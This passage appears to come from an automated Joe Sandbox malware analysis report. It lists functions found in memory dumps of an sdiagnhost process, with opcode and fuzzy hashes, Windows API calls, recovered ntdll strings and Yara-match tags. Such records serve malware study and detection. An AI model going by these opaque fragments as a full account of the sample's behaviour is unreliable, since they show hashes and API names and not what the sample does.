                                                                                                        • Opcode ID: dc83588131f44574cd8422807d7d2f336c0821cf7bb5ccc9da02023e0697a3b3
                                                                                                        • Instruction ID: ee37d85e4c3c10ce1a11fab9c094aeeda05619d176f2a91bc7a8158f15bd1b9f
                                                                                                        • Opcode Fuzzy Hash: dc83588131f44574cd8422807d7d2f336c0821cf7bb5ccc9da02023e0697a3b3
                                                                                                        • Instruction Fuzzy Hash: 8DF0C27AE0424DABCF10CAA0DC81FE9B7B8DB65718F0042D9E9589A191E330AA45CB40
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,001C1FA0,001D803E,?,001C1F68), ref: 001C82C1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 2340568224-0
                                                                                                        • Opcode ID: 9ad5c7cd2f8ef0fada5dab60bb431c19a32b899c5780426ef53cd69d5a340172
                                                                                                        • Instruction ID: 98d9d9e8aec63c65e1f4268cb1e3c4cb287f403d7adb433ab1225a9478ceb88b
                                                                                                        • Opcode Fuzzy Hash: 9ad5c7cd2f8ef0fada5dab60bb431c19a32b899c5780426ef53cd69d5a340172
                                                                                                        • Instruction Fuzzy Hash: 57F0E2776903043BF701DBB09C57F9A37589B90754F094BAAF848DB2C3DA29E71183A1
                                                                                                        APIs
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 001B9D62
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: 7d764a1fd8e6ceb11f9eeff8e4eefaca39d9d48bddce07a01f8b5cff2ca1e6bb
• Instruction ID: f79c4c80312136f0cee847634c928bdaa6012b1ecf561ea6ea928e0a07c0e286
• Opcode Fuzzy Hash: 7d764a1fd8e6ceb11f9eeff8e4eefaca39d9d48bddce07a01f8b5cff2ca1e6bb
• Instruction Fuzzy Hash: 94F06D3338030436E63062EAAC03FD7B79CCB90B61F140426F70CEB2C1DA91B81146E5
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 001B9D62
Memory Dump Source
• Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: ded18e58f46a882eee064b0db53704717c31d2dce733c10f1b86191560bc7bd7
• Instruction ID: 106362f02fc80142b1328a72790b45b5c8dd9c7207a1a8f82ac992aadaf2f487
• Opcode Fuzzy Hash: ded18e58f46a882eee064b0db53704717c31d2dce733c10f1b86191560bc7bd7
• Instruction Fuzzy Hash: DDF0923738030432E23062D98C13FC77B9C8F95B60F140419F709AB2C1DE95B80186F5
APIs
• RtlAllocateHeap.NTDLL(001C1CB6,?,001D577C,001C1CB6,?,001D577C,?,001C1CB6,001D56FE,00001000,?,00000000), ref: 001D96DC
Memory Dump Source
• Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: b20bf07ec4b29eb737d9fd0ab97a1927744358f06c43db782af747029bf9a184
• Instruction ID: 974f04916750b8ff86aefb56aadde18b72068ad554ea110d93e849d11f09ce9f
• Opcode Fuzzy Hash: b20bf07ec4b29eb737d9fd0ab97a1927744358f06c43db782af747029bf9a184
• Instruction Fuzzy Hash: EDE06D722002047BC610EE58DC41F9B73ACEFC8720F404109F908A7241D770B81086B5
APIs
• RtlFreeHeap.NTDLL(00000000,00000004,00000000,553FF0FC,00000007,00000000,00000004,00000000,001C3FE9,000000F4), ref: 001D9729
Memory Dump Source
• Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 71584d4d737ab25cda815ccf41897d3a747d03738cc4f5f1a56aefb8a9824e85
• Instruction ID: c491bf93a9354fa419ce0af5c2751c7830ecb7b6b36f4623c961cbc3f2606420
• Opcode Fuzzy Hash: 71584d4d737ab25cda815ccf41897d3a747d03738cc4f5f1a56aefb8a9824e85
• Instruction Fuzzy Hash: BCE092722002047FD610EF58DC41EDB33ACEFC9710F404409F908A7242D774B81087B4
APIs
• GetFileAttributesW.KERNELBASE(?), ref: 001C84BA
Memory Dump Source
• Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 067228ad0dd4da4acf0515b25aaa4aea2d46f4fe0aba2920e4dcb7ac398a2a80
• Instruction ID: 45c271b50935ae949e8b90c0097136842ee27600d8cf1ec5491f87b8388c6a02
• Opcode Fuzzy Hash: 067228ad0dd4da4acf0515b25aaa4aea2d46f4fe0aba2920e4dcb7ac398a2a80
• Instruction Fuzzy Hash: A9E0867625030927FA1867BC9C86F66339C8B58734F194A64B91CDB2C2EA74F9114154
APIs
• PostThreadMessageW.USER32(?,00000111), ref: 001C10B4
Memory Dump Source
• Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
• Instruction ID: 1c039950bd7412e8b6423b1b3d1805f5cdece3f84a16952b81b67c187aa536be
• Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
• Instruction Fuzzy Hash: 6BD02277B4010C3AAA1245C4ACC1DFFB76CDB86AA6F004067FF08E2040E7219D020BB1
APIs
• SetErrorMode.KERNELBASE(00008003,?,?,001C1FA0,001D803E,?,001C1F68), ref: 001C82C1
Memory Dump Source
• Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 129a9c37bd851f6f47cc411459ea1357c907075c7fa2f6302c3ba3c21280c732
• Instruction ID: 06bb2a007a6bd60613b6e57d250fd43dff622b5ac808e936218c8da7d6b96f16
• Opcode Fuzzy Hash: 129a9c37bd851f6f47cc411459ea1357c907075c7fa2f6302c3ba3c21280c732
• Instruction Fuzzy Hash: 00D05E727903083BF500A7E59D07F66329C5B10764F0544A4F908E72C2EA61F5108565
APIs
Memory Dump Source
• Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
• Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: c13cefadcb73ee698c7043fcd6fc9f616da6defce8b80f223ccd501729074f85
• Instruction ID: 2b3c3cd4e2754e21d76bcb34bdde4fdd884cfde8d3c8c58d0694f5b1e887bc23
• Opcode Fuzzy Hash: c13cefadcb73ee698c7043fcd6fc9f616da6defce8b80f223ccd501729074f85
• Instruction Fuzzy Hash: 21B04C719015D5D6EE11A760460961B79006BE0705F55C162D3025652A4768D191E175
Strings
Memory Dump Source
• Source File: 00000009.00000002.3899605553.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_4240000_sdiagnhost.jbxd
Similarity
• API ID:
• String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
• API String ID: 0-3754132690
• Opcode ID: e7f911cb81a7b53bb765c442217429830efe473f80b05d0a724f9c23c46918c5
• Instruction ID: 4e48fda76cb5e164b17b476a4110ee3c301e3c0fb712080421e4c4c8d0814d08
• Opcode Fuzzy Hash: e7f911cb81a7b53bb765c442217429830efe473f80b05d0a724f9c23c46918c5
• Instruction Fuzzy Hash: FD9150F04183948AC7158F58A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
• Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: b6c21375b5897b2835f7a07cbbf6d375ed02474ef1282235354d609a19da2abb
• Instruction ID: 57e8a6ad06cf3b9a7d3fc3cd6d4bb60075f73c2dfbce16f46b41f4acc0a4f41f
• Opcode Fuzzy Hash: b6c21375b5897b2835f7a07cbbf6d375ed02474ef1282235354d609a19da2abb
• Instruction Fuzzy Hash: AE51E7B6B40516BFDF20DF9C998097FF7B8BB48204754826BE465E7641E274FE108BA0
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
• Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 82862d4ab5ced5be35564b1621a1088890987843d97fcfcda2ca004acdf6bf84
• Instruction ID: ad8a59eb334c497eaa52896911fafc67e3e61b5b3e7fb8e500792fc65d74ca39
• Opcode Fuzzy Hash: 82862d4ab5ced5be35564b1621a1088890987843d97fcfcda2ca004acdf6bf84
• Instruction Fuzzy Hash: 3C51F3B5A40645ABDF30EE9CC99087FB7F8BF44204B40849FE896D3641E6B4FA408B60
Strings
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04444725
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04444655
• ExecuteOptions, xrefs: 044446A0
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 044446FC
• CLIENT(ntdll): Processing section info %ws..., xrefs: 04444787
• Execute=1, xrefs: 04444713
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04444742
Memory Dump Source
• Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
• Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
• Opcode ID: 0dd3b3c9faec629e0a851d1d8a03d53a68eea605cc8f3ba52176d78fcf543ba3
• Instruction ID: 3b6389c4fc4aed444558b49fbea922fc1066ae0c3c338f78f0d2365ce78d4f51
• Opcode Fuzzy Hash: 0dd3b3c9faec629e0a851d1d8a03d53a68eea605cc8f3ba52176d78fcf543ba3
• Instruction Fuzzy Hash: D5516D316002097AFF20AAA5EC45FBA77A8EF04354F0444BFE505A72D1EB70BE558F52
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
• Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
• Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
• Instruction ID: 935792238107139aadfcc68fc9af59f18ca39f40b35deb1eb67df553fbcfb6dc
• Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
• Instruction Fuzzy Hash: 4C81CF70E052898EEF248E68C8907FEBBB1EF55720F18451BE861A73B1C734B841CB61
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
• Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$[$]:%u
• API String ID: 48624451-2819853543
• Opcode ID: d8220b9d4f63fb95de3f4cae6ec2e07bef877fb4bc7e1308e003583b49ac4896
• Instruction ID: 3d08c8e24ca7a52a71135e09e7add5bf20904d1450e1723b93406214239bdb95
• Opcode Fuzzy Hash: d8220b9d4f63fb95de3f4cae6ec2e07bef877fb4bc7e1308e003583b49ac4896
• Instruction Fuzzy Hash: 70218176A00119ABDF11EFA9D840AAFBBE8FF44744F54015BE905E3201E770E9118BA0
                                                                                                        Strings
                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 044402E7
                                                                                                        • RTL: Re-Waiting, xrefs: 0444031E
                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 044402BD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                         • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                         • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                         • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                        • API String ID: 0-2474120054
                                                                                                        • Opcode ID: f864202d6dc87859c155a4b2f9191b6efaf0960f0875a7593d2689ece306f33a
                                                                                                        • Instruction ID: 140f6b44ade7751a76a7e4d25b23ce77ea09e6615615a36fcfe5d7de62fe8c76
                                                                                                        • Opcode Fuzzy Hash: f864202d6dc87859c155a4b2f9191b6efaf0960f0875a7593d2689ece306f33a
                                                                                                        • Instruction Fuzzy Hash: 6FE19070604B419FEB24CF28C844B2AB7E0BB88714F140A5EFA958B7E1DB75F955CB42
                                                                                                        Strings
                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04447B7F
                                                                                                        • RTL: Re-Waiting, xrefs: 04447BAC
                                                                                                        • RTL: Resource at %p, xrefs: 04447B8E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                         • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                         • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                         • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 0-871070163
                                                                                                        • Opcode ID: c8f057dce6d9579cb34ba5de1273800474a8b0e6f36facf8b26391b70668a20a
                                                                                                        • Instruction ID: 9a7597f25bd46ead73dc87f18d2df823f35e999948405da88eeacb142b9ea927
                                                                                                        • Opcode Fuzzy Hash: c8f057dce6d9579cb34ba5de1273800474a8b0e6f36facf8b26391b70668a20a
                                                                                                        • Instruction Fuzzy Hash: EC41BF317007429FEF24DE259840B6BB7E5EB88714F004A2EF956DB781DB31F8168B96
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0444728C
                                                                                                        Strings
                                                                                                        • RTL: Re-Waiting, xrefs: 044472C1
                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04447294
                                                                                                        • RTL: Resource at %p, xrefs: 044472A3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                         • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                         • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                         • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 885266447-605551621
                                                                                                        • Opcode ID: f603e38433622e16de6fd4a3b63b0e924e635197de9ee536c369a5c23a2134e4
                                                                                                        • Instruction ID: b7030e362796782eb91a231a308c4423acec60f5af28160b2da956251cc95ce2
                                                                                                        • Opcode Fuzzy Hash: f603e38433622e16de6fd4a3b63b0e924e635197de9ee536c369a5c23a2134e4
                                                                                                        • Instruction Fuzzy Hash: 58411031700242ABEF20DE65CC42B6AB7A5FB84714F10462BF955AB780DB31F8568BD5
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                         • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                         • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                         • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$]:%u
                                                                                                        • API String ID: 48624451-3050659472
                                                                                                        • Opcode ID: ebb20bdf5bbc35091bf985f1be91dde05042e6dc83ad6386c5a15d50d8b31589
                                                                                                        • Instruction ID: ba10335f030370f1b9a41d9f0e87f07a2d7583508f38a9bbdad3045080b7f230
                                                                                                        • Opcode Fuzzy Hash: ebb20bdf5bbc35091bf985f1be91dde05042e6dc83ad6386c5a15d50d8b31589
                                                                                                        • Instruction Fuzzy Hash: 7E316676A002199FDF60DE39CD50BAF77E8FB44614F84459AE849E3201EF70BA448B61
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                         • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                         • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                         • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-
                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                        • Instruction ID: 8db3acc0b42c0387ede826d9ad334f24cacc985f258fdd7e04b1e974c334995d
                                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                        • Instruction Fuzzy Hash: 3D917071E4021A9BEF24DF69C881ABFB7E5AF44720F64451BE855E73E0E730A9418B60
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                         • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                         • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                         • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$@
                                                                                                        • API String ID: 0-1194432280
                                                                                                        • Opcode ID: 8d8befcec7b5514fdef3976c644228172f3c251bca55a60f6c5627322a024605
                                                                                                        • Instruction ID: 5efc460e51c047bf8f859fafaaf51ce2c4b02b3e2201171f1be082e04d2a5d9c
                                                                                                        • Opcode Fuzzy Hash: 8d8befcec7b5514fdef3976c644228172f3c251bca55a60f6c5627322a024605
                                                                                                        • Instruction Fuzzy Hash: A6810CB2D012699BDB359F54CC45BEAB6B4AF08714F0441DAA919B7280E7706E85CFA0